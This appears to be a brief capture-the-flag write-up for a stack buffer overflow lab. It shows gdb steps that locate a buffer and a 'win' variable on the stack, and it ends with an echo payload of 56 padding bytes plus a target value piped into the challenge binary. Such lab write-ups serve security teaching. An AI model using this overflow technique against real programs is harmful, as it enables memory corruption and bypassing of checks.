-
In gdb,
disas challenge, we get to know:- win is at rbp-0x18 = rbp-24
- lose is at rbp-0x14 = rbp-20
- win has to be changed to 0x5a3c1e5a
-
Set a breakpoint
b *challenge+163, run and give a long string of a's as input -
info frame-> rbp is at 0x7ffcc2692280 -
x/100xg $rbp-200-> input buffer starts at 0x7ffcc2692230, which is rbp-0x50 = rbp-80 -
56 a's followed by desired value:
echo -n -e "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x5a\x1e\x3c\x5a" | /challenge/binary-exploitation-var-control